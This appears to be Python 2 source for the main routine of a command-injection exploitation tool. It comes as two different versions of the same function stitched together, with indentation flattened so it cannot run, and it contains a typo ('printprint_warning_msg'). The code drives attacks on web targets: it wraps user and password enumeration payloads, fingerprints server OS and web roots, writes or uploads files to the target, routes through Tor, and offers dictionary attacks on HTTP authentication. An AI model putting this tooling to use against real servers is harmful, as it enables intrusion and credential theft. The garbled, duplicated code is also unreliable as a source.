def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--dependencies" option. # For checking (non-core) third party dependenices. if menu.options.noncore_dependencies: checks.third_party_dependencies() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() sys.exit(0) # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) if menu.options.level > 3: err_msg = "The value for option '--level' " err_msg += "must be an integer value from range [1, 3]." print settings.print_error_msg(err_msg) sys.exit(0) # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab). if menu.options.logfile: parser.logfile_parser() # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check provided parameters for tests if menu.options.test_parameter: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[1:] settings.TEST_PARAMETER = menu.options.test_parameter.split(",") for i in range(0, len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[ i].split("=")[0] # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if "," in menu.options.tech: split_techniques_names = menu.options.tech.split(",") else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0, len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0, len(split_first_letter)): if split_first_letter[ j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace( ' ', '' ) not in settings.AVAILABLE_TECHNIQUES and found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[ i] + "' as injection technique. " err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, " err_msg += "(T)ime-based, (F)ile-based (with or without commas)." print settings.print_error_msg(err_msg) sys.exit(0) # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower( ) not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print settings.print_error_msg(err_msg) sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." print settings.print_error_msg(err_msg) sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None: err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print settings.print_error_msg(err_msg) sys.exit(0) # Check if defined "--file-upload" option. if menu.options.file_upload: # Check if not defined URL for upload. if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. " print settings.print_error_msg(err_msg) sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # Check if http / https url = checks.check_http_s(url) if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR # One directory up, if Windows or if the script is being run under "/src". if settings.IS_WINDOWS or "/src" in os.path.dirname( os.path.abspath(__file__)): os.chdir("..") output_dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() info_msg = "Checking connection to the target URL... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' to provide an HTTP header or" err_msg += " '--headers=\"HEADER_NAME:" + settings.INJECT_TAG + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_error_msg(err_msg) sys.exit(0) except: raise html_data = content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Used a valid pair of valid credentials if menu.options.auth_cred: info_msg = "Identified a valid pair of credentials '" + Style.UNDERLINE info_msg += menu.options.auth_cred + Style.RESET_ALL + Style.BRIGHT + "'." print Style.BRIGHT + info_msg + Style.RESET_ALL try: if response.info()['server']: server_banner = response.info()['server'] found_os_server = False if menu.options.os and checks.user_defined_os(): user_defined_os = settings.TARGET_OS for i in range(0, len(settings.SERVER_OS_BANNERS)): if settings.SERVER_OS_BANNERS[i].lower( ) in server_banner.lower(): found_os_server = True settings.TARGET_OS = settings.SERVER_OS_BANNERS[ i].lower() if settings.TARGET_OS == "win" or settings.TARGET_OS == "microsoft": identified_os = "Windows" if menu.options.os and user_defined_os != "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os settings.TARGET_OS = identified_os[: 3].lower( ) if menu.options.shellshock: err_msg = "The shellshock module is not available for " + identified_os + " targets." print settings.print_critical_msg( err_msg) raise SystemExit() else: identified_os = "Unix-like (" + settings.TARGET_OS + ")" if menu.options.os and user_defined_os == "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os found_server_banner = False if menu.options.verbose: info_msg = "Identifying the target server..." print settings.print_info_msg(info_msg) for i in range(0, len(settings.SERVER_BANNERS)): if settings.SERVER_BANNERS[i].lower( ) in server_banner.lower(): if menu.options.verbose: success_msg = "The server was identified as " success_msg += Style.UNDERLINE + server_banner + Style.RESET_ALL + "." print settings.print_success_msg( success_msg) settings.SERVER_BANNER = server_banner found_server_banner = True # Set up default root paths if settings.SERVER_BANNERS[i].lower( ) == "apache": if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = "\\htdocs" else: settings.SRV_ROOT_DIR = "/var/www" if settings.SERVER_BANNERS[i].lower( ) == "nginx": settings.SRV_ROOT_DIR = "/usr/share/nginx" if settings.SERVER_BANNERS[i].lower( ) == "microsoft-iis": settings.SRV_ROOT_DIR = "\\inetpub\\wwwroot" break if not found_server_banner: warn_msg = "Heuristics have failed to identify server." print settings.print_warning_msg(warn_msg) # Store the Server's root dir settings.DEFAULT_SRV_ROOT_DIR = settings.SRV_ROOT_DIR # Retrieve everything from the supported enumeration options. if menu.options.enum_all: checks.enable_all_enumeration_options() if menu.options.is_admin or menu.options.is_root and not menu.options.current_user: menu.options.current_user = True # Check for wrong flags. if settings.TARGET_OS == "win": if menu.options.is_root: warn_msg = "Swithing '--is-root' to '--is-admin' because the target has been identified as windows." print settings.print_warning_msg(warn_msg) if menu.options.passwords: warn_msg = "The '--passwords' option, is not yet available for Windows targets." print settings.print_warning_msg(warn_msg) if menu.options.file_upload: warn_msg = "The '--file-upload' option, is not yet available for windows targets. " warn_msg += "Instead, use the '--file-write' option." print settings.print_warning_msg(warn_msg) sys.exit(0) else: if menu.options.is_admin: warn_msg = "Swithing the '--is-admin' to '--is-root' because " warn_msg += "the target has been identified as unix-like. " print settings.print_warning_msg(warn_msg) if found_os_server == False and \ not menu.options.os: # If "--shellshock" option is provided then, # by default is a Linux/Unix operating system. if menu.options.shellshock: pass else: warn_msg = "Heuristics have failed to identify server's operating system." print settings.print_warning_msg(warn_msg) while True: question_msg = "Do you recognise the server's operating system? [(W)indows/(U)nix/(q)uit] > " got_os = raw_input( settings.print_question_msg( question_msg)).lower() if got_os.lower() in settings.CHOICE_OS: if got_os.lower() == "w": settings.TARGET_OS = "win" break elif got_os.lower() == "u": break elif got_os.lower() == "q": raise SystemExit() else: if got_os == "": got_os = "enter" err_msg = "'" + got_os + "' is not a valid answer." print settings.print_error_msg( err_msg) + "\n" pass if not menu.options.os: if found_server_banner == False: warn_msg = "The server which was identified as " + server_banner + " seems unknown." print settings.print_warning_msg(warn_msg) else: found_os_server = checks.user_defined_os() except KeyError: pass # Charset detection [1]. # [1] http://www.w3schools.com/html/html_charset.asp # Check if HTML4 format if menu.options.verbose: info_msg = "Identifing the indicated web-page charset..." print settings.print_info_msg(info_msg) content = re.findall(r";charset=(.*)\"", html_data) if len(content) != 0: charset = content else: # Check if HTML5 format charset = re.findall(r"charset=['\"](.*?)['\"]", html_data) if len(charset) != 0: settings.CHARSET = charset[len(charset) - 1] if settings.CHARSET.lower() not in settings.CHARSET_LIST: warn_msg = "The indicated web-page charset " + settings.CHARSET + " seems unknown." print settings.print_warning_msg(warn_msg) else: if menu.options.verbose: success_msg = "The indicated web-page charset appears to be " success_msg += Style.UNDERLINE + settings.CHARSET + Style.RESET_ALL + "." print settings.print_success_msg(success_msg) except urllib2.HTTPError, e: # Check the codes of responses if e.getcode() == 500: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" content = e.read() sys.exit(0) # Check for HTTP Error 401 (Unauthorized). elif e.getcode() == 401: try: # Get the auth header value auth_line = e.headers.get('www-authenticate', '') # Checking for authentication type name. auth_type = auth_line.split()[0] settings.SUPPORTED_HTTP_AUTH_TYPES.index( auth_type.lower()) # Checking for the realm attribute. try: auth_obj = re.match('''(\w*)\s+realm=(.*)''', auth_line).groups() realm = auth_obj[1].split(',')[0].replace("\"", "") except: realm = False except ValueError: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "The identified HTTP authentication type (" + auth_type + ") is not yet supported." print settings.print_error_msg(err_msg) + "\n" sys.exit(0) except IndexError: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "The provided pair of " + menu.options.auth_type err_msg += " HTTP authentication credentials '" + menu.options.auth_cred + "'" err_msg += " seems to be invalid." print settings.print_error_msg(err_msg) sys.exit(0) print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" if menu.options.auth_type and menu.options.auth_type != auth_type.lower( ): if checks.identified_http_auth_type(auth_type): menu.options.auth_type = auth_type.lower() else: menu.options.auth_type = auth_type.lower() # Check for stored auth credentials. if not menu.options.auth_cred: try: stored_auth_creds = session_handler.export_valid_credentials( url, auth_type.lower()) except: stored_auth_creds = False if stored_auth_creds: menu.options.auth_cred = stored_auth_creds success_msg = "Identified a valid pair of credentials '" + Style.UNDERLINE success_msg += menu.options.auth_cred + Style.RESET_ALL + Style.BRIGHT + "'." print settings.print_success_msg(success_msg) else: # Basic authentication if menu.options.auth_type == "basic": if not menu.options.ignore_401: warn_msg = "(" + menu.options.auth_type.capitalize( ) + ") " warn_msg += "HTTP authentication credentials are required." printprint_warning_msg(warn_msg) while True: question_msg = "Do you want to perform a dictionary-based attack? [Y/n/q] > " crack_creds = raw_input( settings.print_question_msg( question_msg)).lower() if crack_creds in settings.CHOICE_YES: auth_creds = authentication.http_auth_cracker( url, realm) if auth_creds != False: menu.options.auth_cred = auth_creds settings.REQUIRED_AUTHENTICATION = True break else: sys.exit(0) elif crack_creds in settings.CHOICE_NO: checks.http_auth_err_msg() elif crack_creds in settings.CHOICE_QUIT: sys.exit(0) else: if crack_creds == "": crack_creds = "enter" err_msg = "'" + crack_creds + "' is not a valid answer." print settings.print_error_msg( err_msg) + "\n" pass # Digest authentication elif menu.options.auth_type == "digest": if not menu.options.ignore_401: warn_msg = "(" + menu.options.auth_type.capitalize( ) + ") " warn_msg += "HTTP authentication credentials are required." print settings.print_warning_msg(warn_msg) # Check if heuristics have failed to identify the realm attribute. if not realm: warn_msg = "Heuristics have failed to identify the realm attribute." print settings.print_warning_msg( warn_msg) while True: question_msg = "Do you want to perform a dictionary-based attack? [Y/n/q] > " crack_creds = raw_input( settings.print_question_msg( question_msg)).lower() if crack_creds in settings.CHOICE_YES: auth_creds = authentication.http_auth_cracker( url, realm) if auth_creds != False: menu.options.auth_cred = auth_creds settings.REQUIRED_AUTHENTICATION = True break else: sys.exit(0) elif crack_creds in settings.CHOICE_NO: checks.http_auth_err_msg() elif crack_creds in settings.CHOICE_QUIT: sys.exit(0) else: if crack_creds == "": crack_creds = "enter" err_msg = "'" + crack_creds + "' is not a valid answer." print settings.print_error_msg( err_msg) + "\n" pass else: checks.http_auth_err_msg() else: pass elif e.getcode() == 403: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "You don't have permission to access this page." print settings.print_error_msg(err_msg) sys.exit(0) elif e.getcode() == 404: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "The host seems to be down!" print settings.print_error_msg(err_msg) sys.exit(0) else: raise except urllib2.URLError, e: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "The host seems to be down!" print settings.print_error_msg(err_msg) sys.exit(0)
def main(): try: # Check if defined "--version" option. if menu.options.version: version.show_version() sys.exit(0) # Checkall the banner menu.banner() # Check python version number. version.python_version() # Check if defined "--dependencies" option. # For checking (non-core) third party dependenices. if menu.options.noncore_dependencies: checks.third_party_dependencies() sys.exit(0) # Check if defined "--update" option. if menu.options.update: update.updater() # Check if defined "--install" option. if menu.options.install: install.installer() sys.exit(0) # Check arguments if len(sys.argv) == 1: menu.parser.print_help() print "" sys.exit(0) # Define the level of verbosity. if menu.options.verbose > 1: err_msg = "The value for option '-v' " err_msg += "must be an integer value from range [0, 1]." print settings.print_critical_msg(err_msg) sys.exit(0) else: settings.VERBOSITY_LEVEL = menu.options.verbose # Check if defined "--delay" option. if menu.options.delay: if menu.options.delay > "0": settings.DELAY = menu.options.delay # Define the level of tests to perform. if menu.options.level > 3: err_msg = "The value for option '--level' " err_msg += "must be an integer value from range [1, 3]." print settings.print_critical_msg(err_msg) sys.exit(0) # Parse target / data from HTTP proxy logs (i.e Burp / WebScarab). if menu.options.logfile: parser.logfile_parser() # Check provided parameters for tests if menu.options.test_parameter: if menu.options.test_parameter.startswith("="): menu.options.test_parameter = menu.options.test_parameter[1:] settings.TEST_PARAMETER = menu.options.test_parameter.split(settings.PARAMETER_SPLITTING_REGEX) for i in range(0,len(settings.TEST_PARAMETER)): if "=" in settings.TEST_PARAMETER[i]: settings.TEST_PARAMETER[i] = settings.TEST_PARAMETER[i].split("=")[0] # Check if ".git" exists and check for updated version! if os.path.isdir("./.git") and settings.CHECK_FOR_UPDATES_ON_START: update.check_for_update() # Check if defined character used for splitting parameter values. if menu.options.pdel: settings.PARAMETER_DELIMITER = menu.options.pdel # Check if defined character used for splitting cookie values. if menu.options.cdel: settings.COOKIE_DELIMITER = menu.options.cdel # Check if specified wrong injection technique if menu.options.tech and menu.options.tech not in settings.AVAILABLE_TECHNIQUES: found_tech = False # Convert injection technique(s) to lowercase menu.options.tech = menu.options.tech.lower() # Check if used the ',' separator if settings.PARAMETER_SPLITTING_REGEX in menu.options.tech: split_techniques_names = menu.options.tech.split(settings.PARAMETER_SPLITTING_REGEX) else: split_techniques_names = menu.options.tech.split() if split_techniques_names: for i in range(0,len(split_techniques_names)): if len(menu.options.tech) <= 4: split_first_letter = list(menu.options.tech) for j in range(0,len(split_first_letter)): if split_first_letter[j] in settings.AVAILABLE_TECHNIQUES: found_tech = True else: found_tech = False if split_techniques_names[i].replace(' ', '') not in settings.AVAILABLE_TECHNIQUES and \ found_tech == False: err_msg = "You specified wrong value '" + split_techniques_names[i] err_msg += "' as injection technique. " err_msg += "The value, must be a string composed by the letters (C)lassic, (E)val-based, " err_msg += "(T)ime-based, (F)ile-based (with or without commas)." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if specified wrong alternative shell if menu.options.alter_shell: if menu.options.alter_shell.lower() not in settings.AVAILABLE_SHELLS: err_msg = "'" + menu.options.alter_shell + "' shell is not supported!" print settings.print_critical_msg(err_msg) sys.exit(0) # Check the file-destination if menu.options.file_write and not menu.options.file_dest or \ menu.options.file_upload and not menu.options.file_dest: err_msg = "Host's absolute filepath to write and/or upload, must be specified (--file-dest)." print settings.print_critical_msg(err_msg) sys.exit(0) if menu.options.file_dest and menu.options.file_write == None and menu.options.file_upload == None : err_msg = "You must enter the '--file-write' or '--file-upload' parameter." print settings.print_critical_msg(err_msg) sys.exit(0) # Check if defined "--random-agent" option. if menu.options.random_agent: menu.options.agent = random.choice(settings.USER_AGENT_LIST) # Check if defined "--url" option. if menu.options.url: url = menu.options.url # Check if http / https url = checks.check_http_s(url) if menu.options.output_dir: output_dir = menu.options.output_dir else: output_dir = settings.OUTPUT_DIR # One directory up, if Windows or if the script is being run under "/src". if settings.IS_WINDOWS or "/src" in os.path.dirname(os.path.abspath(__file__)): os.chdir("..") output_dir = os.path.dirname(output_dir) try: os.stat(output_dir) except: os.mkdir(output_dir) # The logs filename construction. filename = logs.create_log_file(url, output_dir) try: # Check if defined POST data if menu.options.data: request = urllib2.Request(url, menu.options.data) else: request = urllib2.Request(url) headers.do_check(request) # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: proxy.do_check(url) # Check if defined Tor (--tor option). elif menu.options.tor: tor.do_check() info_msg = "Checking connection to the target URL... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() try: # Check if defined any HTTP Proxy (--proxy option). if menu.options.proxy: response = proxy.use_proxy(request) # Check if defined Tor (--tor option). elif menu.options.tor: response = tor.use_tor(request) else: try: response = urllib2.urlopen(request) except ValueError: # Invalid format for the '--headers' option. print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" err_msg = "Use '--headers=\"HEADER_NAME:HEADER_VALUE\"' " err_msg += "to provide an HTTP header or" err_msg += " '--headers=\"HEADER_NAME:" + settings.WILDCARD_CHAR + "\"' " err_msg += "if you want to try to exploit the provided HTTP header." print settings.print_critical_msg(err_msg) sys.exit(0) except: raise html_data = content = response.read() print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" # Check for CGI scripts on url checks.check_CGI_scripts(url) # Modification on payload if not menu.options.shellshock: #settings.CURRENT_USER = "******" + settings.CURRENT_USER + ")" settings.SYS_USERS = "echo $(" + settings.SYS_USERS + ")" settings.SYS_PASSES = "echo $(" + settings.SYS_PASSES + ")" # Check if defined "--file-upload" option. if menu.options.file_upload: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): # Check if not defined URL for upload. while True: question_msg = "Do you want to enable an HTTP server? [Y/n/q] > " sys.stdout.write(settings.print_question_msg(question_msg)) enable_HTTP_server = sys.stdin.readline().replace("\n","").lower() if enable_HTTP_server in settings.CHOICE_YES: # Check if file exists if not os.path.isfile(menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' file, does not exists." sys.stdout.write(settings.print_critical_msg(err_msg) + "\n") sys.exit(0) http_server = "http://" + str(settings.LOCAL_HTTP_IP) + ":" + str(settings.LOCAL_HTTP_PORT) + "/" info_msg = "Setting the HTTP server on '" + http_server + "'. " print settings.print_info_msg(info_msg) menu.options.file_upload = http_server + menu.options.file_upload simple_http_server.main() break elif enable_HTTP_server in settings.CHOICE_NO: if not re.match(settings.VALID_URL_FORMAT, menu.options.file_upload): err_msg = "The '" + menu.options.file_upload + "' is not a valid URL. " print settings.print_critical_msg(err_msg) sys.exit(0) break elif enable_HTTP_server in settings.CHOICE_QUIT: sys.exit(0) else: if enable_HTTP_server == "": enable_HTTP_server = "enter" err_msg = "'" + enable_HTTP_server + "' is not a valid answer." print settings.print_error_msg(err_msg) pass try: urllib2.urlopen(menu.options.file_upload) except urllib2.HTTPError, err_msg: print settings.print_critical_msg(err_msg) sys.exit(0) except urllib2.URLError, err_msg: print settings.print_critical_msg(err_msg) sys.exit(0) # Used a valid pair of valid credentials if menu.options.auth_cred: success_msg = Style.BRIGHT + "Identified a valid pair of credentials '" success_msg += menu.options.auth_cred + Style.RESET_ALL success_msg += Style.BRIGHT + "'." + Style.RESET_ALL print settings.print_success_msg(success_msg) try: if response.info()['server'] : server_banner = response.info()['server'] found_os_server = False if menu.options.os and checks.user_defined_os(): user_defined_os = settings.TARGET_OS # Procedure for target OS identification. for i in range(0,len(settings.SERVER_OS_BANNERS)): if settings.SERVER_OS_BANNERS[i].lower() in server_banner.lower(): found_os_server = True settings.TARGET_OS = settings.SERVER_OS_BANNERS[i].lower() if settings.TARGET_OS == "win" or settings.TARGET_OS == "microsoft" : identified_os = "Windows" if menu.options.os and user_defined_os != "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os settings.TARGET_OS = identified_os[:3].lower() if menu.options.shellshock: err_msg = "The shellshock module is not available for " err_msg += identified_os + " targets." print settings.print_critical_msg(err_msg) raise SystemExit() else: identified_os = "Unix-like (" + settings.TARGET_OS + ")" if menu.options.os and user_defined_os == "win": if not checks.identified_os(): settings.TARGET_OS = user_defined_os # Procedure for target server identification. found_server_banner = False if settings.VERBOSITY_LEVEL >= 1: info_msg = "Identifying the target server... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() for i in range(0,len(settings.SERVER_BANNERS)): if settings.SERVER_BANNERS[i].lower() in server_banner.lower(): if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" if settings.VERBOSITY_LEVEL >= 1: success_msg = "The target server was identified as " success_msg += server_banner + Style.RESET_ALL + "." print settings.print_success_msg(success_msg) settings.SERVER_BANNER = server_banner found_server_banner = True # Set up default root paths if settings.SERVER_BANNERS[i].lower() == "apache": if settings.TARGET_OS == "win": settings.SRV_ROOT_DIR = "\\htdocs" else: settings.SRV_ROOT_DIR = "/var/www" if settings.SERVER_BANNERS[i].lower() == "nginx": settings.SRV_ROOT_DIR = "/usr/share/nginx" if settings.SERVER_BANNERS[i].lower() == "microsoft-iis": settings.SRV_ROOT_DIR = "\\inetpub\\wwwroot" break if not found_server_banner: if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" warn_msg = "Heuristics have failed to identify target server." print settings.print_warning_msg(warn_msg) # Procedure for target application identification found_application_extension = False if settings.VERBOSITY_LEVEL >= 1: info_msg = "Identifying the target application ... " sys.stdout.write(settings.print_info_msg(info_msg)) sys.stdout.flush() root, application_extension = splitext(urlparse(url).path) settings.TARGET_APPLICATION = application_extension[1:].upper() if settings.TARGET_APPLICATION: found_application_extension = True if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" success_msg = "The target application was identified as " success_msg += settings.TARGET_APPLICATION + Style.RESET_ALL + "." print settings.print_success_msg(success_msg) # Check for unsupported target applications for i in range(0,len(settings.UNSUPPORTED_TARGET_APPLICATION)): if settings.TARGET_APPLICATION.lower() in settings.UNSUPPORTED_TARGET_APPLICATION[i].lower(): err_msg = settings.TARGET_APPLICATION + " exploitation is not yet supported." print settings.print_critical_msg(err_msg) raise SystemExit() if not found_application_extension: if settings.VERBOSITY_LEVEL >= 1: print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" warn_msg = "Heuristics have failed to identify target application." print settings.print_warning_msg(warn_msg) # Load tamper scripts if menu.options.tamper: checks.tamper_scripts() # Store the Server's root dir settings.DEFAULT_SRV_ROOT_DIR = settings.SRV_ROOT_DIR if menu.options.is_admin or menu.options.is_root and not menu.options.current_user: menu.options.current_user = True # Define Python working directory. if settings.TARGET_OS == "win" and menu.options.alter_shell: while True: question_msg = "Do you want to use '" + settings.WIN_PYTHON_DIR question_msg += "' as Python working directory on the target host? [Y/n] > " sys.stdout.write(settings.print_question_msg(question_msg)) python_dir = sys.stdin.readline().replace("\n","").lower() if python_dir in settings.CHOICE_YES: break elif python_dir in settings.CHOICE_NO: question_msg = "Please provide a custom working directory for Python (e.g. '" question_msg += settings.WIN_PYTHON_DIR + "') > " sys.stdout.write(settings.print_question_msg(question_msg)) settings.WIN_PYTHON_DIR = sys.stdin.readline().replace("\n","").lower() break else: if python_dir == "": python_dir = "enter" err_msg = "'" + python_dir + "' is not a valid answer." print settings.print_error_msg(err_msg) pass settings.USER_DEFINED_PYTHON_DIR = True # Check for wrong flags. if settings.TARGET_OS == "win": if menu.options.is_root : warn_msg = "Swithing '--is-root' to '--is-admin' because the " warn_msg += "target has been identified as windows." print settings.print_warning_msg(warn_msg) if menu.options.passwords: warn_msg = "The '--passwords' option, is not yet available for Windows targets." print settings.print_warning_msg(warn_msg) if menu.options.file_upload : warn_msg = "The '--file-upload' option, is not yet available for windows targets. " warn_msg += "Instead, use the '--file-write' option." print settings.print_warning_msg(warn_msg) sys.exit(0) else: if menu.options.is_admin : warn_msg = "Swithing the '--is-admin' to '--is-root' because " warn_msg += "the target has been identified as unix-like. " print settings.print_warning_msg(warn_msg) if found_os_server == False and \ not menu.options.os: # If "--shellshock" option is provided then, # by default is a Linux/Unix operating system. if menu.options.shellshock: pass else: warn_msg = "Heuristics have failed to identify server's operating system." print settings.print_warning_msg(warn_msg) while True: question_msg = "Do you recognise the server's operating system? " question_msg += "[(W)indows/(U)nix/(q)uit] > " sys.stdout.write(settings.print_question_msg(question_msg)) got_os = sys.stdin.readline().replace("\n","").lower() if got_os.lower() in settings.CHOICE_OS : if got_os.lower() == "w": settings.TARGET_OS = "win" break elif got_os.lower() == "u": break elif got_os.lower() == "q": raise SystemExit() else: if got_os == "": got_os = "enter" err_msg = "'" + got_os + "' is not a valid answer." print settings.print_error_msg(err_msg) pass if not menu.options.os: if found_server_banner == False: warn_msg = "The server which was identified as " warn_msg += server_banner + " seems unknown." print settings.print_warning_msg(warn_msg) else: found_os_server = checks.user_defined_os() except KeyError: pass # Charset detection. requests.charset_detection(response)